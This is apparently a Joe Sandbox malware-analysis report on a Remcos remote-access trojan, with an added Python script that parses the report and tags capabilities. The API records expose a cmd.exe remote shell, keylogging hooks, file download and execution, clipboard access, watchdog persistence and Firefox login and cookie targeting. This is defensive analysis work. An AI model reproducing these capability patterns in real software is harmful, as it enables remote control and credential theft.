• Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
• Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8

APIs
• GlobalMemoryStatusEx.KERNELBASE(?), ref: 0041B85B
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: GlobalMemoryStatus
• String ID: @
• API String ID: 1890195054-2766056989
• Opcode ID: 23b0e77897189e0b78fa4d1d520ef24eb5f5038ce1868e817330353f58216111
• Instruction ID: 3eac6c9810fdf3f5cdd4c6aee73cb3509883e52e26c84b2cc96e0464d85798e3
• Opcode Fuzzy Hash: 23b0e77897189e0b78fa4d1d520ef24eb5f5038ce1868e817330353f58216111
• Instruction Fuzzy Hash: F6D017B58023189FC720DFA8E804A8DBBFCEB08210F00456AEC49E3300E770EC008B84

APIs
• socket.WS2_32(?,00000001,00000006), ref: 00404852
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CreateEventStartupsocket
• String ID:
• API String ID: 1953588214-0
• Opcode ID: 4d13770ae0ce35ce4dbd6fcc6f24a1261d6c2af77246669734211e402fddb5c6
• Instruction ID: d30f6c82ceabff406a890a607b6903e59214fa94f63df9469096212d3e1caec2
• Opcode Fuzzy Hash: 4d13770ae0ce35ce4dbd6fcc6f24a1261d6c2af77246669734211e402fddb5c6
• Instruction Fuzzy Hash: F90171B1408B809ED7359F28A8456967FE0AB55304F044D6EF1DA97B92D3B5A881CB18

Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
• Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
• Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
• Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D

APIs
• GetForegroundWindow.USER32 ref: 0041BB49
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Window$ForegroundText
• String ID:
• API String ID: 29597999-0
• Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
• Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
• Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
• Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5

APIs
• getaddrinfo.WS2_32(00000000,00000000,00000000,00472AF0,004750F4,00000000,004151C3,00000000,00000001), ref: 00414F46
• WSASetLastError.WS2_32(00000000), ref: 00414F4B
  • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
  • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
  • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
  • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
  • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
• String ID:
• API String ID: 1170566393-0
• Opcode ID: 930efd5b04e65bc9372c1b57b3a52d6002a1f5a2d46d5e1141b82df15956c107
• Instruction ID: b2b0aefd8e35b341f4c894e58f46b645776b5e98a3349e02c71c7f637998c076
• Opcode Fuzzy Hash: 930efd5b04e65bc9372c1b57b3a52d6002a1f5a2d46d5e1141b82df15956c107
• Instruction Fuzzy Hash: 9DD05B322005316BD310576D6C00FFB569EDFD7760B110037F404D3251DA949C8247AC

Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: _wcslen
• String ID:
• API String ID: 176396367-0
• Opcode ID: 6416f66ed626dfbba5e3356b56a4da38da9dbdb7e4b27ac51402a9fd72fbddea
• Instruction ID: d045c5f40cf3cd8d18dd0e016010c764e1ae3afdbf5b32035de166f485dbb4de
• Opcode Fuzzy Hash: 6416f66ed626dfbba5e3356b56a4da38da9dbdb7e4b27ac51402a9fd72fbddea
• Instruction Fuzzy Hash: 681193319002059BCB15EF66E842AEE7BB5AF54314B10403FF446672E2EF78AD15CB98

APIs
  • Part of subcall function 00445B74: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
• _free.LIBCMT ref: 004501C0
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
• Instruction ID: 1bf88885f7a62dfe3e195aa205353632c6f85cb380d5d404dcdd82bf2c99678c
• Opcode Fuzzy Hash: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
• Instruction Fuzzy Hash: DB014976200744ABE731CF6ACC42D5AFBD8EB85370F25062EE58483281EB34A909C779

APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
• Instruction ID: ef76d3429b2572ee2e16b707a9c356192af24cfd4e901c13b73aaad13af6506a
• Opcode Fuzzy Hash: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
• Instruction Fuzzy Hash: BEF0B431500F65ABBF222E22AC05E5B3769DB81770B14412BB914EA286CA38FC0186AC

APIs
• RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
• Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
• Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
• Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF

APIs
• WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Startup
• String ID:
• API String ID: 724789610-0
• Opcode ID: 8e7c991b928bea2de9b1e1f5f99946c2d0cf66c9d18890e3be99548e9599c2f5
• Instruction ID: 8755cd578eecc9cf916cb98f31ec890f8d4d8ec8e876fe09ba6f20fbb4fb2f80
• Opcode Fuzzy Hash: 8e7c991b928bea2de9b1e1f5f99946c2d0cf66c9d18890e3be99548e9599c2f5
• Instruction Fuzzy Hash: 02D0123255C60CCED620ABB4AD0F8A4775CC717616F0403BA6CB5C26D7E6405A2DC2AB

APIs
• __Init_thread_footer.LIBCMT ref: 004056E6
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• __Init_thread_footer.LIBCMT ref: 00405723
• CreatePipe.KERNEL32(00476CDC,00476CC4,00476BE8,00000000,004660CC,00000000), ref: 004057B6
• CreatePipe.KERNEL32(00476CC8,00476CE4,00476BE8,00000000), ref: 004057CC
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BF8,00476CCC), ref: 0040583F
• Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
• ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
• WriteFile.KERNEL32(00000000,00000000,?,00000000,00474FA0,004660D0,00000062,004660B4), ref: 004059E4
• Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
• TerminateProcess.KERNEL32(00000000), ref: 00405A17
• CloseHandle.KERNEL32 ref: 00405A23
• CloseHandle.KERNEL32 ref: 00405A2B
• CloseHandle.KERNEL32 ref: 00405A3D
• CloseHandle.KERNEL32 ref: 00405A45
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
• String ID: @lG$@lG$@lG$@lG$@lG$SystemDrive$cmd.exe$kG$lG$lG$lG$lG
• API String ID: 2994406822-3565532687
• Opcode ID: 7f44424ad113f420e48d11417b11709670515d2f43eb42571c8ee31cf0889dad
• Instruction ID: efba9956b6c01968ba48be3e84054341744464a70a9fb060b5e58b4ef4e39929
• Opcode Fuzzy Hash: 7f44424ad113f420e48d11417b11709670515d2f43eb42571c8ee31cf0889dad
• Instruction Fuzzy Hash: ED91B271600604AFD711FB35AD41A6B3AAAEB84344F01443FF549A72E2DB7D9C488F6D

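The record above (two CreatePipe calls, CreateProcessA with bInheritHandles = 1, a PeekNamedPipe/ReadFile/WriteFile loop with short Sleeps, TerminateProcess, and the strings SystemDrive and cmd.exe) is the RAT's remote command shell. Together with the socket record at 00404852 (socket(?, 1, 6) is SOCK_STREAM/IPPROTO_TCP, WSAStartup(0x0202) requests Winsock 2.2), the GetForegroundWindow/GetWindowTextW record at 0041BB49 (the active-window title a keylogger stamps into its log), the getaddrinfo record at 00414F46, and the file-manager record that follows (DeleteFileW, FindFirstFileW/RemoveDirectoryW, ShellExecuteW "open", SystemParametersInfoW(0x14) = SPI_SETDESKWALLPAPER with fuWinIni 3 = SPIF_UPDATEINIFILE | SPIF_SENDCHANGE, and the "Browsing directory: " family of status strings), these are the call sites behind the signatures at the top of the report. The Python script below is an added triage helper; it is not part of the Joe Sandbox report and not code from the sample. It parses function records in exactly this text form and tags each function by what its API set and argument values imply. The constants are the Windows SDK values; the capability names and SAMPLE (this page's records, abridged) are the example's own. One caveat it encodes: the getaddrinfo record's GetSystemDirectoryA, LoadLibraryA, GetProcAddress("getaddrinfo"), FreeLibrary, WSASetLastError sequence is the compatibility shim that ws2tcpip.h inlines into every binary that includes it (WspiapiLoad / WspiapiGetAddrInfo), so it should not be read as attacker-side dynamic API resolution.

```python
"""Added triage helper (not part of the Joe Sandbox report or of the sample): parse the
per-function "APIs" / "String ID" records shown above and tag each function with the
capability its call pattern implies. Constants are Windows SDK values; SAMPLE is
constructed from this page's own records, abridged."""
import re
from dataclasses import dataclass, field

# "• API.MODULE(args), ref: ADDR"  or  "• Part of subcall function ADDR: API.MODULE(args), ref: ADDR"
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+):\s+)?"
    r"(?P<api>[\w@]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)")
SOCK_STREAM, IPPROTO_TCP = 1, 6
SPI_SETDESKWALLPAPER = 0x14  # SystemParametersInfoW(0x14, 0, path, SPIF_UPDATEINIFILE | SPIF_SENDCHANGE)


@dataclass
class Func:
    apis: list = field(default_factory=list)     # (api, [args], ref, subcall address or None)
    strings: list = field(default_factory=list)  # "String ID" entries, split on '$'


def parse_records(text):
    """One Func per record; a record ends at its Instruction Fuzzy Hash line (or at EOF)."""
    funcs, cur = [], Func()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.apis.append((m["api"], args, m["ref"], m["sub"]))
        elif line.startswith("• String ID:"):
            cur.strings = [s for s in line.split(":", 1)[1].strip().split("$") if s]
        elif line.startswith("• Instruction Fuzzy Hash:"):
            funcs.append(cur)
            cur = Func()
    if cur.apis or cur.strings:  # report text cut off mid-record, as on this page
        funcs.append(cur)
    return funcs


def arg_int(args, i):
    """Argument i as an int, or None where the sandbox shows '?' or a non-numeric value."""
    try:
        return int(args[i], 16)
    except (IndexError, ValueError):
        return None


def capabilities(f):
    every = {api for api, *_ in f.apis}                        # direct calls and subcalls
    direct = {api for api, _, _, sub in f.apis if sub is None}
    tags = set()
    for api, args, _, _ in f.apis:
        if api == "socket" and (arg_int(args, 1), arg_int(args, 2)) == (SOCK_STREAM, IPPROTO_TCP):
            tags.add("tcp_socket")
        if api == "SystemParametersInfoW" and arg_int(args, 0) == SPI_SETDESKWALLPAPER:
            tags.add("set_wallpaper")
    # cmd.exe started with inheritable pipe handles, its output polled with PeekNamedPipe
    if {"CreatePipe", "CreateProcessA", "PeekNamedPipe"} <= direct and any("cmd.exe" in s for s in f.strings):
        tags.add("remote_cmd_shell")
    if {"GetForegroundWindow", "GetWindowTextW"} <= direct:  # title a keylogger stamps its log with
        tags.add("active_window_title")
    if {"DeleteFileW", "FindFirstFileW", "RemoveDirectoryW", "ShellExecuteW"} <= every:
        tags.add("file_manager")
    # GetSystemDirectoryA -> LoadLibraryA -> GetProcAddress("getaddrinfo") -> WSASetLastError is the
    # ws2tcpip.h WspiapiLoad/WspiapiGetAddrInfo compatibility shim, not attacker-side API resolution
    if {"getaddrinfo", "GetSystemDirectoryA", "LoadLibraryA", "GetProcAddress", "WSASetLastError"} <= every:
        tags.add("ws2tcpip_getaddrinfo_shim")
    return tags


def triage(text):
    """[(address of the function's first listed call, sorted capability tags), ...]"""
    return [(f.apis[0][2], sorted(capabilities(f))) for f in parse_records(text) if f.apis]


SAMPLE = """\
• socket.WS2_32(?,00000001,00000006), ref: 00404852
• Instruction Fuzzy Hash: F90171B1408B809ED7359F28A8456967FE0AB55304F044D6EF1DA97B92D3B5A881CB18
• GetForegroundWindow.USER32 ref: 0041BB49
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
• Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
• getaddrinfo.WS2_32(00000000,00000000,00000000,00472AF0,004750F4,00000000,004151C3,00000000,00000001), ref: 00414F46
• WSASetLastError.WS2_32(00000000), ref: 00414F4B
  • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
  • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
• Instruction Fuzzy Hash: 9DD05B322005316BD310576D6C00FFB569EDFD7760B110037F404D3251DA949C8247AC
• CreatePipe.KERNEL32(00476CDC,00476CC4,00476BE8,00000000,004660CC,00000000), ref: 004057B6
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BF8,00476CCC), ref: 0040583F
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
• String ID: @lG$SystemDrive$cmd.exe$lG
• Instruction Fuzzy Hash: ED91B271600604AFD711FB35AD41A6B3AAAEB84344F01443FF549A72E2DB7D9C488F6D
• DeleteFileW.KERNEL32(00000000), ref: 00407DE4
  • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C37D
  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C402
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
  • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
• String ID: 8PG$Browsing directory: $Deleted file: $Executing file: $open
"""

if __name__ == "__main__":
    for addr, tags in triage(SAMPLE):
        print(addr, ", ".join(tags))
```

Paste the full text of any function block from this report into triage(); the Memory Dump Source, Snapshot File and Similarity lines do not match the call-site pattern and are ignored, and a block that lacks its Instruction Fuzzy Hash line because the report text was cut off, like the last one on this page, is still returned. The tags are deliberately conservative: each one requires the specific combination of direct calls and argument values seen in these records, so a function that merely imports CreateProcessA or calls SystemParametersInfoW with another SPI_ action is not tagged.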
APIs
• SetEvent.KERNEL32(?,?), ref: 00407CF4
• GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
• DeleteFileW.KERNEL32(00000000), ref: 00407DE4
  • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C37D
  • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C3AD
  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C402
  • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C463
  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C46A
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474F08,?), ref: 00404B47
  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474F08,?,?,?,?,?,?,0040547D), ref: 00404B75
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
• GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
• SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
• DeleteFileA.KERNEL32(?), ref: 0040868D
  • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
  • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
  • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
  • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
• Sleep.KERNEL32(000007D0), ref: 00408733
• StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
  • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
• String ID: 8PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$hPG$hPG$hPG$hPG$open
                                                                                                • API String ID: 1067849700-718893278
                                                                                                • Opcode ID: f47694642a9727c552664b30ecd2bee36f1658a4f502a4b631e59be2092a5c87
                                                                                                • Instruction ID: d596b55e62c6dc406d7f5c06aadeacefb76b4acf2f669351df47ebe9cc805958
                                                                                                • Opcode Fuzzy Hash: f47694642a9727c552664b30ecd2bee36f1658a4f502a4b631e59be2092a5c87
                                                                                                • Instruction Fuzzy Hash: 9F4282716043016BC604FB76C9579AE77A9AF91348F80483FF582671E2EE7C9908C79B
APIs
• GetCurrentProcessId.KERNEL32 ref: 00412141
  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
  • Part of subcall function 004138B2: RegSetValueExA.KERNELBASE(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
• OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
• CloseHandle.KERNEL32(00000000), ref: 00412190
• CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
• String ID: (TG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$RG
• API String ID: 3018269243-1913798818
• Opcode ID: bdb2bee7da37e1d86ea7d703bbd03755c4d0d8442807112e76db2deed89afc60
• Instruction ID: 26abbb7e12f392f9fbc718c06b30ae47eaa1113e002934215aad22704783e961
• Opcode Fuzzy Hash: bdb2bee7da37e1d86ea7d703bbd03755c4d0d8442807112e76db2deed89afc60
• Instruction Fuzzy Hash: 3C71A23160420167C604FB72CD579AE77A4AE94308F40097FF586A61E2FFBC9945C69E
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
• FindClose.KERNEL32(00000000), ref: 0040BC04
• FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
• FindClose.KERNEL32(00000000), ref: 0040BD4D
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
• API String ID: 1164774033-3681987949
• Opcode ID: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
• Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
• Opcode Fuzzy Hash: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
• Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
APIs
• OpenClipboard.USER32 ref: 004168FD
• EmptyClipboard.USER32 ref: 0041690B
• GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
• GlobalLock.KERNEL32(00000000), ref: 00416934
• GlobalUnlock.KERNEL32(00000000), ref: 0041696A
• SetClipboardData.USER32(0000000D,00000000), ref: 00416973
• CloseClipboard.USER32 ref: 00416990
• OpenClipboard.USER32 ref: 00416997
• GetClipboardData.USER32(0000000D), ref: 004169A7
• GlobalLock.KERNEL32(00000000), ref: 004169B0
• GlobalUnlock.KERNEL32(00000000), ref: 004169B9
• CloseClipboard.USER32 ref: 004169BF
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
• String ID: !D@
• API String ID: 3520204547-604454484
• Opcode ID: a0ac8c9fcef4dc4e23bfd817548aa8a4d562d0e7a0b2016193ed8f12b8a4dca9
• Instruction ID: 40a69bedac3bd734cdfdd6227e623399476ab8ebe6f0a7c245c4ec6d1d06efb6
• Opcode Fuzzy Hash: a0ac8c9fcef4dc4e23bfd817548aa8a4d562d0e7a0b2016193ed8f12b8a4dca9
• Instruction Fuzzy Hash: 16215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
• FindClose.KERNEL32(00000000), ref: 0040BE04
• FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
• FindClose.KERNEL32(00000000), ref: 0040BEEA
• FindClose.KERNEL32(00000000), ref: 0040BF0B
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Find$Close$File$FirstNext
• String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 3527384056-432212279
• Opcode ID: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
• Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
• Opcode Fuzzy Hash: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
• Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750F4,?,00475348), ref: 0040F4C9
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475348), ref: 0040F4F4
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
• CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475348), ref: 0040F59E
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
• CloseHandle.KERNEL32(00000000,?,00475348), ref: 0040F6A9
Strings
Memory Dump Source
